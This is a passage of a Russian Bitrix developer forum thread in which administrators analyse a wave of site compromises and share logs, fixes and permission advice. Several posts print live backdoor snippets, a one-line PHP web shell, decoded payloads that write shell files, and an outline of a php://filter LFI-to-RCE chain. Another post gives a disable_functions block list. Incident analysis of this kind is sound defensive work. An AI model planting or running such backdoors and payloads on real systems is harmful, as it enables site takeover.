Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 4148622

Заглянувший

Сообщений: 3 Регистрация: 24.04.2020

#476

03.03.2023 11:40:47

Цитата
написал: Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Я тоже им абузу отправил 2 дня назад. Пока тишина.

Евгений Жуков

Администратор

Сообщений: 9434 Баллов: 1828 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#477

03.03.2023 14:10:07

Цитата
написал: "заведомо неизменном проекте" - улыбнуло, кто же такое в наше время может гарантировать ?разве что, на закрытом сайте

Развернули дистрибутив, накатили обновления, провалили тест - об этом случае речь.

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#478

03.03.2023 14:21:19

Цитата

написал:
На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN https://asn.ipinfo.app/AS210644 провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа https://asn.ipinfo.app/api/text/nginx/AS210644 ). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..

О, у меня тоже атаки с выданных ip от aeza

Пользователь 144171

Посетитель

Сообщений: 28 Баллов: 4 Регистрация: 02.10.2012

#479

03.03.2023 15:01:30

вот еще bitrix/modules/main/include/prolog_after.php

Код

define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){
        $APPLICATION->RestartBuffer();
        CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
        die();
}

и таких мест может быть миллион
выше был способ поиска по подстроке, похоже единственно реальный метод сейчас

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#480

03.03.2023 15:06:40

Цитата
Владислав Боднарь написал: и таких мест может быть миллионвыше был способ поиска по подстроке, похоже единственно реальный метод сейчас

да, похоже все последние закладки по str_rot13 находятся - хороший способ
но тем не менее надо сначала фиксить дыры ... следующие закладки будут другие

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 47602

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 24.08.2009

#481

03.03.2023 15:28:10

а насколько такие пост-запросы опасны?

Код

post-1677829681.log   [----]  0 L:[  1+ 0   1/  3] *(0   / 510b) 0097 0x061                                                                                                                                                            [*][X]
array (
  'BX_STAT' => '303q66696p655s7075745s636s6r74656r747326313q3365323232383237616263302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297
)

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#482

03.03.2023 15:48:11

Разбор того как работает взлом через POST к главной странице.

Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это:

Код
<? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>

Видимо по архитектуре Битрикса файл bx_root.php будет задействован при любом запросе. По крайне мере при запросе в корень точно.
Далее, атакующий в любой удобный момент времени посылает POST запрос примерно следующего содержимого:

Код
'BX_STAT' => '303q6669293......o7q7q3s3r'

В bx_root.php он расшифруется в следующее:

Код
0=file_put_contents&1=a0194226a99a.php&2=<?=409723*20;if(md5($_COOKIE[d])=="....?>

или в это

Код
0=file_put_contents&1=bitrix/admin/ea20360ee090.php&2=<?=409723*20;if(md5($_COOKIE[d])=="....?>

или даже в это:

Код
0=system&1=echo PD89N.....DA5NzI1lIl0pO319Pz4=\|base64 -d\| tee 5b186f810c33.php

parse_str заполнит 3 элемента массива $bx_stat, а потом будет вызвана функция с 2-мя аргументами $bx_stat[0]( $bx_stat[1], $bx_stat[2] )
и чаще всего это будет file_put_contents( virus_name, virus_body )

В логах веб-сервера это будет выглядеть как

"GET / HTTP/1.1" 200 3557 "-" ""
"POST / HTTP/1.1" 200 123 "-" ""
"GET /5b186f810c33.php HTTP/1.1" 200 3189 "" ""

Первый запрос GET к корню, потом экплойт через POST. Спустя несколько секунд проверка шелла GET /5b186f810c33.php
Как лечить? Удалить в bx_root.php добавленный код if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")

Но это все следствия! Как и множество других "страшнозакодированных" скриптов и .htaccess'ов которые здесь постили.
Причина, в моем случае точно, в другом. Вот с чего все начиналось:

Код
POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR\|convert.....

У Битрикса где-то внутри стоит что-то вроде include($_POST). Это и есть уязвимость LFI2RCE via PHP Filters!
Весь этот запрос ( он у меня есть ) путем манипуляций кодировок превращается в следующий код:

Код
<?php system($_POST["a"]); ?>

соответственно будет произведен запуск любой команды из POST параметра 'a'.
Ключевое слово для поиска в логах CSISO2022KR - это обозначение корейской кодировки, без нее ничего не работает.
Почему так - сказано в статье https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html

Как лечить? Пока поставить такую заглушку в /products/index.php
if($_SERVER['REQUEST_METHOD']=='POST') die();

Или глобально stream_wrapper_unregister('php')

Искать где находиться уязвимый код include($_POST) буду дальше.

Все полные логи и коды запросов имеются, могу выслать желающим

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#483

03.03.2023 16:22:11

Цитата
написал: В логах веб-сервера это будет выглядеть как Все полные логи и коды запросов имеются, могу выслать желающим

У меня в логах ничего похожего не видать, а результаты с htaccess'ами и рандомными файлами налицо. Версии файлов у меня от 2020 года. После накатывания бэкапа часа через два лезть всякое начинает. Но, может, плохо ищу. И CSISO2022KR тоже не вижу.

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#484

03.03.2023 16:23:59

Цитата
написал: Или глобально stream_wrapper_unregister ('php')

А как глобально можно враппер отключить? Это же так или иначе надо в сам файл php прописать, не в каждый же?

Пользователь 7093356

Заглянувший

Сообщений: 6 Регистрация: 03.03.2023

#485

03.03.2023 16:57:00

Цитата

написал:
Разбор того как работает взлом через POST к главной странице.

Первый запрос GET к корню, потом экплойт через POST. Спустя несколько секунд проверка шелла GET /5b186f810c33.php
Как лечить? Удалить в bx_root.php добавленный код if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")

Возможно будет полезно кому то, у меня история крайне похожа, сайт упал, модифицированный htaccess хтмл файлы, да еще и ограничить вход с 1 ip толком не получается, но у меня не с POSTом дело у меня это выглядит так

Код
if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "") define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);

Я не могу назвать себя программистом, поэтому не могу найти источник проблемы, но если моя ситуация кому то поможет буду рад.

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#486

03.03.2023 17:09:16

Цитата

@Денис написал:

Цитата
Возможно будет полезно кому то, у меня история крайне похожа, сайт упал, модифицированный htaccess хтмл файлы, да еще и ограничить вход с 1 ip толком не получается, но у меня не с POSTом дело у меня это выглядит так

Код
if ( isset ( $_SERVER [ "BX_PERSONAL_ROOT" ]) && $_SERVER [ "BX_PERSONAL_ROOT" ] <> "" ) define( "BX_PERSONAL_ROOT" , $_SERVER [ "BX_PERSONAL_ROOT" ]);

Дык это нормальное содержимое bx_root.php, вот такой он в исходниках:

Код

<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
   $fname1 = realpath(__FILE__);
   $fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}

if(strpos($fname1, $fname2)===0)
{
   $fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
   $bx_root = substr($fname1, strlen($fname3));
   $bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
   $bx_root = "/bitrix";

$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);

if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
   define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
   define("BX_PERSONAL_ROOT", BX_ROOT);
?>

Пользователь 7093356

Заглянувший

Сообщений: 6 Регистрация: 03.03.2023

#487

03.03.2023 17:14:39

Цитата

написал:

Дык это нормальное содержимое bx_root.php, вот такой он в исходниках:

Тогда я уже не знаю куда смотреть, уже третий день валандаюсь с этой хренью, сегодня продлим лицензию и обновим платформу, но блин три дня.
Сначала подняли сайт прошерстили антивирусом, сайт работает, но хтмл файлы все равно появляются, хотя и пустые, просто шарики за ролики уже вылетают. Если обновление платформы не поможет то уже не знаю что делать

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#488

03.03.2023 17:24:17

vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#489

03.03.2023 17:28:04

Цитата
Солюшнс АВИ написал: вот такой он в исходниках:

в исходниках с закоментированным кодом?
если так, то я был лучшего мнения о команде программистов Битрикса

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#490

03.03.2023 17:31:55

Цитата
vvv476 написал: Почему так - сказано в статье https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html

переведите в 2х словах плиз

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#491

03.03.2023 17:50:16

Цитата
написал: в исходниках с закоментированным кодом? если так, то я был лучшего мнения о команде программистов Битрикса

да там в каждом втором файле какая-то лажа

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#492

03.03.2023 17:53:18

Цитата

написал:
vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы

Это не проверочные запросы, поверьте. Код который он несет

Код
<?php system($_POST["a"]); ?>

позволяет делать что угодно. Факт его удачного исполнения подтвержден кодом 200 сервера. К сожалению я не перехватил что именно было в параметре POST "a" того запроса, но характер последующих действий показал что после него началась эксплуатация сервера через bx_root.php про которую я писал выше. Тем, у кого дрянь вылезает после двух часов от бэкапа. Читайте логи веб-сервера. Фильтруйте, анализируйте. Если не найдете сами, пришлите мне.

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#493

03.03.2023 23:15:47

Антон Костин,

Цитата
написал: disable_functions = evil,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source ... теперь собираю статистику что делают и куда ломятся ))

Более мене с не большими последствиями можно заблокировать вот эти
disable_functions = shell_exec,exec,passthru,system,proc_open,curl_multi_exec,parse_ini_file,show_source

exec:
catalog\export
catalog\import

system:
sale\location\import

proc_open:
scale

show_source:
fileman

очень много используется:
eval
curl_exec

Есть мысли как избавиться от использования eval в коде Bitrix что бы eval тоже можно заблокировать?

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#494

03.03.2023 23:22:37

vvv476,

Цитата
Или глобально stream_wrapper_unregister ('php')

Сломается не только php://filter а еще куча https://www.php.net/manual/ru/wrappers.php.php

Самое очевидные
php://input
php://output
php://temp

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#495

03.03.2023 23:29:06

Солюшнс АВИ,

Цитата
написал: А как глобально можно враппер отключить? Это же так или иначе надо в сам файл php прописать, не в каждый же?

В конфиг-файле php можно использовать auto_append_file

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#496

03.03.2023 23:37:48

А вообще права на папки и файлы не должны позволять изменять и создавать папки и файлы пользователю под которым веб-сервер запущен т.е. этому пользователю нужны права только чтение. В корне сайта есть папка /upload/ только в этой папке можно этому пользователю файлы создавать, но не запускать.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#497

04.03.2023 03:59:22

Цитата

xRayDev написал:
А вообще права на папки и файлы не должны позволять изменять и создавать папки и файлы пользователю под которым веб-сервер запущен т.е. этому пользователю нужны права только чтение. В корне сайта есть папка /upload/ только в этой папке можно этому пользователю файлы создавать, но не запускать.

/bitrix/ можно только на чтение поставить, кроме этих директорий
/bitrix/backup/
/bitrix/cache/
/bitrix/managed_cache/
/bitrix/stack_cache/
/bitrix/tmp/ - этот не знаю
ну и естественно при обновлениях движка права нужно будет вернуть

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#498

04.03.2023 04:07:00

Цитата
vvv476 Код который он несет позволяет делать что угодно.

Согласен.

Цитата
vvv476 написал: Факт его удачного исполнения подтвержден кодом 200 сервера.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#499

04.03.2023 04:08:04

Цитата

Алексей Вдовин написал:

Цитата
vvv476 Код который он несет позволяет делать что угодно.

Согласен.

Цитата
vvv476 написал: Факт его удачного исполнения подтвержден кодом 200 сервера.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте, возможно придётся ещё подработать ловилку чтобы передаваемый файл сохранить.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#500

04.03.2023 14:23:19

Цитата

Загляните в spread.php. Найдете такой код:

Код
if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"])) { $arState = array(); parse_str(base64_decode($_REQUEST["state"]), $arState); echo $arState[0]($arState[1],$arState[2]); die(); }

Методика та же что и в bx_root - Вызов любой функции с 2-мя аргументами пришедшими из интернета. Удалите или закомментриуйте его. Это тоже следствие. Причины пока ищу.

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером